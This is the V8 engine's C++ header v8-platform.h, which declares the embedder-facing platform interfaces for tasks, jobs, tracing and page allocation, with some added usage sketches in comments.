// Copyright 2013 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

#ifndef V8_V8_PLATFORM_H_
#define V8_V8_PLATFORM_H_

#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>  // For abort.
#include <memory>
#include <string>

#include "v8config.h"  // NOLINT(build/include_directory)

namespace v8 {

class Isolate;

// Valid priorities supported by the task scheduling infrastructure.
enum class TaskPriority : uint8_t {
  /**
   * Best effort tasks are not critical for performance of the application. The
   * platform implementation should preempt such tasks if higher priority tasks
   * arrive.
   */
  kBestEffort,
  /**
   * User visible tasks are long running background tasks that will
   * improve performance and memory usage of the application upon completion.
   * Example: background compilation and garbage collection.
   */
  kUserVisible,
  /**
   * User blocking tasks are highest priority tasks that block the execution
   * thread (e.g. major garbage collection). They must be finished as soon as
   * possible.
   */
  kUserBlocking,
};

/**
 * A Task represents a unit of work.
 */
class Task {
 public:
  virtual ~Task() = default;

  virtual void Run() = 0;
};

/**
 * An IdleTask represents a unit of work to be performed in idle time.
 * The Run method is invoked with an argument that specifies the deadline in
 * seconds returned by MonotonicallyIncreasingTime().
 * The idle task is expected to complete by this deadline.
 */
class IdleTask {
 public:
  virtual ~IdleTask() = default;
  virtual void Run(double deadline_in_seconds) = 0;
};
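
/*
 * Example (editorial sketch, not part of the V8 API): an IdleTask that does
 * small units of work until the deadline passes. HasWork(), DoOneUnitOfWork()
 * and NowInSeconds() are hypothetical helpers; NowInSeconds() is assumed to be
 * backed by the same clock as Platform::MonotonicallyIncreasingTime().
 *
 *   class ChunkedIdleTask : public IdleTask {
 *    public:
 *     void Run(double deadline_in_seconds) override {
 *       while (HasWork() && NowInSeconds() < deadline_in_seconds) {
 *         DoOneUnitOfWork();
 *       }
 *     }
 *   };
 */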

/**
 * A TaskRunner allows scheduling of tasks. The TaskRunner may still be used to
 * post tasks after the isolate gets destructed, but these tasks may not get
 * executed anymore. All tasks posted to a given TaskRunner will be invoked in
 * sequence. Tasks can be posted from any thread.
 */
class TaskRunner {
 public:
  /**
   * Schedules a task to be invoked by this TaskRunner. The TaskRunner
   * implementation takes ownership of |task|.
   */
  virtual void PostTask(std::unique_ptr<Task> task) = 0;

  /**
   * Schedules a task to be invoked by this TaskRunner. The TaskRunner
   * implementation takes ownership of |task|. The |task| cannot be nested
   * within other task executions.
   *
   * Tasks which shouldn't be interleaved with JS execution must be posted with
   * |PostNonNestableTask| or |PostNonNestableDelayedTask|. This is because the
   * embedder may process tasks in a callback which is called during JS
   * execution.
   *
   * In particular, tasks which execute JS must be non-nestable, since JS
   * execution is not allowed to nest.
   *
   * Requires that |TaskRunner::NonNestableTasksEnabled()| is true.
   */
  virtual void PostNonNestableTask(std::unique_ptr<Task> task) {}

  /**
   * Schedules a task to be invoked by this TaskRunner. The task is scheduled
   * after the given number of seconds |delay_in_seconds|. The TaskRunner
   * implementation takes ownership of |task|.
   */
  virtual void PostDelayedTask(std::unique_ptr<Task> task,
                               double delay_in_seconds) = 0;

  /**
   * Schedules a task to be invoked by this TaskRunner. The task is scheduled
   * after the given number of seconds |delay_in_seconds|. The TaskRunner
   * implementation takes ownership of |task|. The |task| cannot be nested
   * within other task executions.
   *
   * Tasks which shouldn't be interleaved with JS execution must be posted with
   * |PostNonNestableTask| or |PostNonNestableDelayedTask|. This is because the
   * embedder may process tasks in a callback which is called during JS
   * execution.
   *
   * In particular, tasks which execute JS must be non-nestable, since JS
   * execution is not allowed to nest.
   *
   * Requires that |TaskRunner::NonNestableDelayedTasksEnabled()| is true.
   */
  virtual void PostNonNestableDelayedTask(std::unique_ptr<Task> task,
                                          double delay_in_seconds) {}

  /**
   * Schedules an idle task to be invoked by this TaskRunner. The task is
   * scheduled when the embedder is idle. Requires that
   * |TaskRunner::IdleTasksEnabled()| is true. Idle tasks may be reordered
   * relative to other task types and may be starved for an arbitrarily long
   * time if no idle time is available. The TaskRunner implementation takes
   * ownership of |task|.
   */
  virtual void PostIdleTask(std::unique_ptr<IdleTask> task) = 0;

  /**
   * Returns true if idle tasks are enabled for this TaskRunner.
   */
  virtual bool IdleTasksEnabled() = 0;

  /**
   * Returns true if non-nestable tasks are enabled for this TaskRunner.
   */
  virtual bool NonNestableTasksEnabled() const { return false; }

  /**
   * Returns true if non-nestable delayed tasks are enabled for this TaskRunner.
   */
  virtual bool NonNestableDelayedTasksEnabled() const { return false; }

  TaskRunner() = default;
  virtual ~TaskRunner() = default;

  TaskRunner(const TaskRunner&) = delete;
  TaskRunner& operator=(const TaskRunner&) = delete;
};
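
/*
 * Example (editorial sketch, not part of the V8 API): posting work through a
 * TaskRunner. `platform` and `isolate` are assumed to be provided by the
 * embedder; GetForegroundTaskRunner() is declared on Platform below, and
 * Log() is a hypothetical sink.
 *
 *   class LogTask : public Task {
 *    public:
 *     explicit LogTask(std::string msg) : msg_(std::move(msg)) {}
 *     void Run() override { Log(msg_); }
 *    private:
 *     std::string msg_;
 *   };
 *
 *   std::shared_ptr<TaskRunner> runner =
 *       platform->GetForegroundTaskRunner(isolate);
 *   runner->PostTask(std::make_unique<LogTask>("now"));
 *   runner->PostDelayedTask(std::make_unique<LogTask>("in two seconds"), 2.0);
 */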

/**
 * Delegate that's passed to Job's worker task, providing an entry point to
 * communicate with the scheduler.
 */
class JobDelegate {
 public:
  /**
   * Returns true if the worker task should return from the current thread as
   * soon as possible. Workers should invoke ShouldYield() periodically, as
   * often as is reasonable.
   */
  virtual bool ShouldYield() = 0;

  /**
   * Notifies the scheduler that max concurrency was increased, and the number
   * of workers should be adjusted accordingly. See Platform::PostJob() for
   * more details.
   */
  virtual void NotifyConcurrencyIncrease() = 0;

  /**
   * Returns a task_id unique among threads currently running this job, such
   * that GetTaskId() < worker count. To achieve this, the same task_id may be
   * reused by a different thread after a worker_task returns.
   */
  virtual uint8_t GetTaskId() = 0;

  /**
   * Returns true if the current task is called from the thread currently
   * running JobHandle::Join().
   * TODO(etiennep): Make pure virtual once custom embedders implement it.
   */
  virtual bool IsJoiningThread() const { return false; }
};
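
/*
 * Example (editorial sketch, not part of the V8 API): using GetTaskId() for
 * lock-free per-worker state inside a JobTask. `scratch_` is a hypothetical
 * vector sized to the maximum worker count; because GetTaskId() is always
 * less than the worker count, each concurrently running worker gets its own
 * slot.
 *
 *   void MyJobTask::Run(JobDelegate* delegate) {
 *     LocalState& local = scratch_[delegate->GetTaskId()];
 *     while (!delegate->ShouldYield()) {
 *       if (!ProcessNextItemInto(&local)) return;  // Hypothetical helper.
 *     }
 *   }
 */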

/**
 * Handle returned when posting a Job. Provides methods to control execution of
 * the posted Job.
 */
class JobHandle {
 public:
  virtual ~JobHandle() = default;

  /**
   * Notifies the scheduler that max concurrency was increased, and the number
   * of workers should be adjusted accordingly. See Platform::PostJob() for
   * more details.
   */
  virtual void NotifyConcurrencyIncrease() = 0;

  /**
   * Contributes to the job on this thread. Doesn't return until all tasks have
   * completed and max concurrency becomes 0. When Join() is called and max
   * concurrency reaches 0, it should not increase again. This also promotes
   * this Job's priority to be at least as high as the calling thread's
   * priority.
   */
  virtual void Join() = 0;

  /**
   * Forces all existing workers to yield ASAP. Waits until they have all
   * returned from the Job's callback before returning.
   */
  virtual void Cancel() = 0;

  /**
   * Forces all existing workers to yield ASAP but doesn't wait for them.
   * Warning, this is dangerous if the Job's callback is bound to or has access
   * to state which may be deleted after this call.
   * TODO(etiennep): Cleanup once implemented by all embedders.
   */
  virtual void CancelAndDetach() { Cancel(); }

  /**
   * Returns true if there's any work pending or any worker running.
   */
  virtual bool IsActive() = 0;

  // TODO(etiennep): Clean up once all overrides are removed.
  V8_DEPRECATED("Use !IsActive() instead.")
  virtual bool IsCompleted() { return !IsActive(); }

  /**
   * Returns true if associated with a Job and other methods may be called.
   * Returns false after Join() or Cancel() was called. This may return true
   * even if no workers are running and IsCompleted() returns true.
   */
  virtual bool IsValid() = 0;

  // TODO(etiennep): Clean up once all overrides are removed.
  V8_DEPRECATED("Use IsValid() instead.")
  virtual bool IsRunning() { return IsValid(); }

  /**
   * Returns true if job priority can be changed.
   */
  virtual bool UpdatePriorityEnabled() const { return false; }

  /**
   *  Update this Job's priority.
   */
  virtual void UpdatePriority(TaskPriority new_priority) {}
};
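
/*
 * Example (editorial sketch, not part of the V8 API): a typical lifecycle of
 * a handle returned by Platform::PostJob(). `platform`, `queue`, MakeWorkItem()
 * and MyJobTask are assumed embedder-side names; see the PostJob()
 * documentation below for a full MyJobTask definition.
 *
 *   std::unique_ptr<JobHandle> handle = platform->PostJob(
 *       TaskPriority::kUserVisible, std::make_unique<MyJobTask>(&queue));
 *   queue.Push(MakeWorkItem());           // More work arrived...
 *   handle->NotifyConcurrencyIncrease();  // ...so tell the scheduler.
 *   if (handle->UpdatePriorityEnabled())
 *     handle->UpdatePriority(TaskPriority::kUserBlocking);
 *   handle->Join();  // Or handle->Cancel() before `queue` is destroyed.
 */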

/**
 * A JobTask represents work to run in parallel from Platform::PostJob().
 */
class JobTask {
 public:
  virtual ~JobTask() = default;

  virtual void Run(JobDelegate* delegate) = 0;

  /**
   * Controls the maximum number of threads calling Run() concurrently, given
   * the number of threads currently assigned to this job and executing Run().
   * Run() is only invoked if the number of threads previously running Run() was
   * less than the value returned. Since GetMaxConcurrency() is a leaf function,
   * it must not call back into any JobHandle methods.
   */
  virtual size_t GetMaxConcurrency(size_t worker_count) const = 0;

  // TODO(1114823): Clean up once all overrides are removed.
  V8_DEPRECATED("Use the version that takes |worker_count|.")
  virtual size_t GetMaxConcurrency() const { return 0; }
};

/**
 * The interface represents complex arguments to trace events.
 */
class ConvertableToTraceFormat {
 public:
  virtual ~ConvertableToTraceFormat() = default;

  /**
   * Append the class info to the provided |out| string. The appended
   * data must be a valid JSON object. Strings must be properly quoted and
   * escaped. There is no processing applied to the content after it is
   * appended.
   */
  virtual void AppendAsTraceFormat(std::string* out) const = 0;
};
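
/*
 * Example (editorial sketch, not part of the V8 API): a trace argument that
 * serializes itself as a JSON object, as AppendAsTraceFormat() requires.
 *
 *   class PointArg : public ConvertableToTraceFormat {
 *    public:
 *     PointArg(int x, int y) : x_(x), y_(y) {}
 *     void AppendAsTraceFormat(std::string* out) const override {
 *       // Must append a valid JSON object; no further escaping is applied.
 *       out->append("{\"x\":" + std::to_string(x_) +
 *                   ",\"y\":" + std::to_string(y_) + "}");
 *     }
 *    private:
 *     int x_, y_;
 *   };
 */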

/**
 * V8 Tracing controller.
 *
 * Can be implemented by an embedder to record trace events from V8.
 */
class TracingController {
 public:
  virtual ~TracingController() = default;

  // In Perfetto mode, trace events are written using Perfetto's Track Event
  // API directly without going through the embedder. However, it is still
  // possible to observe tracing being enabled and disabled.
#if !defined(V8_USE_PERFETTO)
  /**
   * Called by TRACE_EVENT* macros, don't call this directly.
   * The name parameter is a category group for example:
   * TRACE_EVENT0("v8,parse", "V8.Parse")
   * The pointer returned points to a value with zero or more of the bits
   * defined in CategoryGroupEnabledFlags.
   **/
  virtual const uint8_t* GetCategoryGroupEnabled(const char* name) {
    static uint8_t no = 0;
    return &no;
  }

  /**
   * Adds a trace event to the platform tracing system. These function calls are
   * usually the result of a TRACE_* macro from trace_event_common.h when
   * tracing and the category of the particular trace are enabled. It is not
   * advisable to call these functions on their own; they are really only meant
   * to be used by the trace macros. The returned handle can be used by
   * UpdateTraceEventDuration to update the duration of COMPLETE events.
   */
  virtual uint64_t AddTraceEvent(
      char phase, const uint8_t* category_enabled_flag, const char* name,
      const char* scope, uint64_t id, uint64_t bind_id, int32_t num_args,
      const char** arg_names, const uint8_t* arg_types,
      const uint64_t* arg_values,
      std::unique_ptr<ConvertableToTraceFormat>* arg_convertables,
      unsigned int flags) {
    return 0;
  }
  virtual uint64_t AddTraceEventWithTimestamp(
      char phase, const uint8_t* category_enabled_flag, const char* name,
      const char* scope, uint64_t id, uint64_t bind_id, int32_t num_args,
      const char** arg_names, const uint8_t* arg_types,
      const uint64_t* arg_values,
      std::unique_ptr<ConvertableToTraceFormat>* arg_convertables,
      unsigned int flags, int64_t timestamp) {
    return 0;
  }

  /**
   * Sets the duration field of a COMPLETE trace event. It must be called with
   * the handle returned from AddTraceEvent().
   **/
  virtual void UpdateTraceEventDuration(const uint8_t* category_enabled_flag,
                                        const char* name, uint64_t handle) {}
#endif  // !defined(V8_USE_PERFETTO)

  class TraceStateObserver {
   public:
    virtual ~TraceStateObserver() = default;
    virtual void OnTraceEnabled() = 0;
    virtual void OnTraceDisabled() = 0;
  };

  /** Adds tracing state change observer. */
  virtual void AddTraceStateObserver(TraceStateObserver*) {}

  /** Removes tracing state change observer. */
  virtual void RemoveTraceStateObserver(TraceStateObserver*) {}
};
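
/*
 * Example (editorial sketch, not part of the V8 API): observing tracing state
 * changes. `controller` is assumed to be the embedder's TracingController;
 * OpenOutputFile() and FlushAndClose() are hypothetical, and the observer must
 * stay alive until it is removed.
 *
 *   class FileTraceObserver : public TracingController::TraceStateObserver {
 *    public:
 *     void OnTraceEnabled() override { OpenOutputFile(); }
 *     void OnTraceDisabled() override { FlushAndClose(); }
 *   };
 *
 *   FileTraceObserver observer;
 *   controller->AddTraceStateObserver(&observer);
 *   // ... later, before `observer` is destroyed:
 *   controller->RemoveTraceStateObserver(&observer);
 */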

/**
 * A V8 memory page allocator.
 *
 * Can be implemented by an embedder to manage large host OS allocations.
 */
class PageAllocator {
 public:
  virtual ~PageAllocator() = default;

  /**
   * Gets the page granularity for AllocatePages and FreePages. Addresses and
   * lengths for those calls should be multiples of AllocatePageSize().
   */
  virtual size_t AllocatePageSize() = 0;

  /**
   * Gets the page granularity for SetPermissions and ReleasePages. Addresses
   * and lengths for those calls should be multiples of CommitPageSize().
   */
  virtual size_t CommitPageSize() = 0;

  /**
   * Sets the random seed so that GetRandomMmapAddr() will generate repeatable
   * sequences of random mmap addresses.
   */
  virtual void SetRandomMmapSeed(int64_t seed) = 0;

  /**
   * Returns a randomized address, suitable for memory allocation under ASLR.
   * The address will be aligned to AllocatePageSize.
   */
  virtual void* GetRandomMmapAddr() = 0;

  /**
   * Memory permissions.
   */
  enum Permission {
    kNoAccess,
    kRead,
    kReadWrite,
    kReadWriteExecute,
    kReadExecute,
    // Set this when reserving memory that will later require kReadWriteExecute
    // permissions. The resulting behavior is platform-specific, currently
    // this is used to set the MAP_JIT flag on Apple Silicon.
    // TODO(jkummerow): Remove this when Wasm has a platform-independent
    // w^x implementation.
    kNoAccessWillJitLater
  };

  /**
   * Allocates memory in a range with the given alignment and permission.
   */
  virtual void* AllocatePages(void* address, size_t length, size_t alignment,
                              Permission permissions) = 0;

  /**
   * Frees memory in a range that was allocated by a call to AllocatePages.
   */
  virtual bool FreePages(void* address, size_t length) = 0;

  /**
   * Releases memory in a range that was allocated by a call to AllocatePages.
   */
  virtual bool ReleasePages(void* address, size_t length,
                            size_t new_length) = 0;

  /**
   * Sets permissions on pages in an allocated range.
   */
  virtual bool SetPermissions(void* address, size_t length,
                              Permission permissions) = 0;

  /**
   * Frees memory in the given [address, address + size) range. address and size
   * should be operating system page-aligned. The next write to this
   * memory area brings the memory transparently back.
   */
  virtual bool DiscardSystemPages(void* address, size_t size) { return true; }

  /**
   * INTERNAL ONLY: This interface has not been stabilised and may change
   * without notice from one release to another without being deprecated first.
   */
  class SharedMemoryMapping {
   public:
    // Implementations are expected to free the shared memory mapping in the
    // destructor.
    virtual ~SharedMemoryMapping() = default;
    virtual void* GetMemory() const = 0;
  };

  /**
   * INTERNAL ONLY: This interface has not been stabilised and may change
   * without notice from one release to another without being deprecated first.
   */
  class SharedMemory {
   public:
    // Implementations are expected to free the shared memory in the destructor.
    virtual ~SharedMemory() = default;
    virtual std::unique_ptr<SharedMemoryMapping> RemapTo(
        void* new_address) const = 0;
    virtual void* GetMemory() const = 0;
    virtual size_t GetSize() const = 0;
  };

  /**
   * INTERNAL ONLY: This interface has not been stabilised and may change
   * without notice from one release to another without being deprecated first.
   *
   * Reserve pages at a fixed address returning whether the reservation is
   * possible. The reserved memory is detached from the PageAllocator and so
   * should not be freed by it. It's intended for use with
   * SharedMemory::RemapTo, where ~SharedMemoryMapping would free the memory.
   */
  virtual bool ReserveForSharedMemoryMapping(void* address, size_t size) {
    return false;
  }

  /**
   * INTERNAL ONLY: This interface has not been stabilised and may change
   * without notice from one release to another without being deprecated first.
   *
   * Allocates shared memory pages. Not all PageAllocators need to support
   * this, so this method need not be overridden.
   * Allocates a new read-only shared memory region of size |length| and copies
   * the memory at |original_address| into it.
   */
  virtual std::unique_ptr<SharedMemory> AllocateSharedPages(
      size_t length, const void* original_address) {
    return {};
  }

  /**
   * INTERNAL ONLY: This interface has not been stabilised and may change
   * without notice from one release to another without being deprecated first.
   *
   * If not overridden and changed to return true, V8 will not attempt to call
   * AllocateSharedPages or RemapSharedPages. If overridden, AllocateSharedPages
   * and RemapSharedPages must also be overridden.
   */
  virtual bool CanAllocateSharedPages() { return false; }
};
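
/*
 * Example (editorial sketch, not part of the V8 API): a typical
 * reserve-then-commit flow. `allocator` is an embedder-provided
 * PageAllocator*; reservation sizes are multiples of AllocatePageSize() and
 * committed sizes are multiples of CommitPageSize(), as required above.
 *
 *   const size_t alloc_page = allocator->AllocatePageSize();
 *   const size_t commit_page = allocator->CommitPageSize();
 *   void* region = allocator->AllocatePages(
 *       allocator->GetRandomMmapAddr(), 4 * alloc_page, alloc_page,
 *       PageAllocator::kNoAccess);
 *   if (region != nullptr) {
 *     // Make the first commit-page writable, use it, then free everything.
 *     allocator->SetPermissions(region, commit_page,
 *                               PageAllocator::kReadWrite);
 *     // ... use the memory ...
 *     allocator->FreePages(region, 4 * alloc_page);
 *   }
 */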

/**
 * V8 Platform abstraction layer.
 *
 * The embedder has to provide an implementation of this interface before
 * initializing the rest of V8.
 */
class Platform {
 public:
  virtual ~Platform() = default;

  /**
   * Allows the embedder to manage memory page allocations.
   */
  virtual PageAllocator* GetPageAllocator() {
    // TODO(bbudge) Make this abstract after all embedders implement this.
    return nullptr;
  }

  /**
   * Enables the embedder to respond in cases where V8 can't allocate large
   * blocks of memory. V8 retries the failed allocation once after calling this
   * method. On success, execution continues; otherwise V8 exits with a fatal
   * error.
   * Embedder overrides of this function must NOT call back into V8.
   */
  virtual void OnCriticalMemoryPressure() {
    // TODO(bbudge) Remove this when embedders override the following method.
    // See crbug.com/634547.
  }

  /**
   * Enables the embedder to respond in cases where V8 can't allocate large
   * memory regions. The |length| parameter is the amount of memory needed.
   * Returns true if memory is now available. Returns false if no memory could
   * be made available. V8 will retry allocations until this method returns
   * false.
   *
   * Embedder overrides of this function must NOT call back into V8.
   */
  virtual bool OnCriticalMemoryPressure(size_t length) { return false; }

  /**
   * Gets the number of worker threads used by
   * Call(BlockingTask)OnWorkerThread(). This can be used to estimate the number
   * of tasks a work package should be split into. A return value of 0 means
   * that there are no worker threads available. Note that a value of 0 won't
   * prohibit V8 from posting tasks using |CallOnWorkerThread|.
   */
  virtual int NumberOfWorkerThreads() = 0;

  /**
   * Returns a TaskRunner which can be used to post a task on the foreground.
   * The TaskRunner's NonNestableTasksEnabled() must be true. This function
   * should only be called from a foreground thread.
   */
  virtual std::shared_ptr<v8::TaskRunner> GetForegroundTaskRunner(
      Isolate* isolate) = 0;

  /**
   * Schedules a task to be invoked on a worker thread.
   */
  virtual void CallOnWorkerThread(std::unique_ptr<Task> task) = 0;

  /**
   * Schedules a task that blocks the main thread to be invoked with
   * high-priority on a worker thread.
   */
  virtual void CallBlockingTaskOnWorkerThread(std::unique_ptr<Task> task) {
    // Embedders may optionally override this to process these tasks in a high
    // priority pool.
    CallOnWorkerThread(std::move(task));
  }

  /**
   * Schedules a task to be invoked with low-priority on a worker thread.
   */
  virtual void CallLowPriorityTaskOnWorkerThread(std::unique_ptr<Task> task) {
    // Embedders may optionally override this to process these tasks in a low
    // priority pool.
    CallOnWorkerThread(std::move(task));
  }

  /**
   * Schedules a task to be invoked on a worker thread after |delay_in_seconds|
   * expires.
   */
  virtual void CallDelayedOnWorkerThread(std::unique_ptr<Task> task,
                                         double delay_in_seconds) = 0;

  /**
   * Returns true if idle tasks are enabled for the given |isolate|.
   */
  virtual bool IdleTasksEnabled(Isolate* isolate) { return false; }

  /**
   * Posts |job_task| to run in parallel. Returns a JobHandle associated with
   * the Job, which can be joined or canceled.
   * This avoids degenerate cases:
   * - Calling CallOnWorkerThread() for each work item, causing significant
   *   overhead.
   * - Fixed number of CallOnWorkerThread() calls that split the work and might
   *   run for a long time. This is problematic when many components post
   *   "num cores" tasks and all expect to use all the cores. In these cases,
   *   the scheduler lacks context to be fair to multiple same-priority requests
   *   and/or ability to request lower priority work to yield when high priority
   *   work comes in.
   * A canonical implementation of |job_task| looks like:
   * class MyJobTask : public JobTask {
   *  public:
   *   MyJobTask(...) : worker_queue_(...) {}
   *   // JobTask:
   *   void Run(JobDelegate* delegate) override {
   *     while (!delegate->ShouldYield()) {
   *       // Smallest unit of work.
   *       auto work_item = worker_queue_.TakeWorkItem(); // Thread safe.
   *       if (!work_item) return;
   *       ProcessWork(work_item);
   *     }
   *   }
   *
   *   size_t GetMaxConcurrency(size_t worker_count) const override {
   *     return worker_queue_.GetSize(); // Thread safe.
   *   }
   * };
   * auto handle = PostJob(TaskPriority::kUserVisible,
   *                       std::make_unique<MyJobTask>(...));
   * handle->Join();
   *
   * PostJob() and methods of the returned JobHandle/JobDelegate must never be
   * called while holding a lock that could be acquired by JobTask::Run or
   * JobTask::GetMaxConcurrency -- that could result in a deadlock. This is
   * because [1] JobTask::GetMaxConcurrency may be invoked while holding
   * internal lock (A), hence JobTask::GetMaxConcurrency can only use a lock (B)
   * if that lock is *never* held while calling back into JobHandle from any
   * thread (A=>B/B=>A deadlock) and [2] JobTask::Run or
   * JobTask::GetMaxConcurrency may be invoked synchronously from JobHandle
   * (B=>JobHandle::foo=>B deadlock).
   *
   * A sufficient PostJob() implementation that uses the default Job provided in
   * libplatform looks like:
   *  std::unique_ptr<JobHandle> PostJob(
   *      TaskPriority priority, std::unique_ptr<JobTask> job_task) override {
   *    return v8::platform::NewDefaultJobHandle(
   *        this, priority, std::move(job_task), NumberOfWorkerThreads());
   * }
   */
  virtual std::unique_ptr<JobHandle> PostJob(
      TaskPriority priority, std::unique_ptr<JobTask> job_task) = 0;

  /**
   * Monotonically increasing time in seconds from an arbitrary fixed point in
   * the past. This function is expected to return at least
   * millisecond-precision values. For this reason,
   * it is recommended that the fixed point be no further in the past than
   * the epoch.
   **/
  virtual double MonotonicallyIncreasingTime() = 0;

  /**
   * Current wall-clock time in milliseconds since epoch.
   * This function is expected to return at least millisecond-precision values.
   */
  virtual double CurrentClockTimeMillis() = 0;

  typedef void (*StackTracePrinter)();

  /**
   * Returns a function pointer that prints a stack trace of the current stack
   * on invocation. Returning nullptr disables printing of the stack trace.
   */
  virtual StackTracePrinter GetStackTracePrinter() { return nullptr; }

  /**
   * Returns an instance of a v8::TracingController. This must be non-nullptr.
   */
  virtual TracingController* GetTracingController() = 0;

  /**
   * Tells the embedder to generate and upload a crashdump during an unexpected
   * but non-critical scenario.
   */
  virtual void DumpWithoutCrashing() {}

 protected:
  /**
   * Default implementation of current wall-clock time in milliseconds
   * since epoch. Useful for implementing |CurrentClockTimeMillis| if
   * nothing special is needed.
   */
  V8_EXPORT static double SystemClockTimeMillis();
};
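
/*
 * Example (editorial sketch): most embedders do not implement Platform from
 * scratch but use the default implementation shipped with V8's libplatform.
 * The sketch below assumes libplatform is available and linked; see
 * include/libplatform/libplatform.h.
 *
 *   #include "libplatform/libplatform.h"
 *   #include "v8.h"
 *
 *   int main() {
 *     std::unique_ptr<v8::Platform> platform =
 *         v8::platform::NewDefaultPlatform();
 *     v8::V8::InitializePlatform(platform.get());
 *     v8::V8::Initialize();
 *     // ... create isolates and run scripts ...
 *     v8::V8::Dispose();
 *     v8::V8::ShutdownPlatform();
 *     return 0;
 *   }
 */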

}  // namespace v8

#endif  // V8_V8_PLATFORM_H_
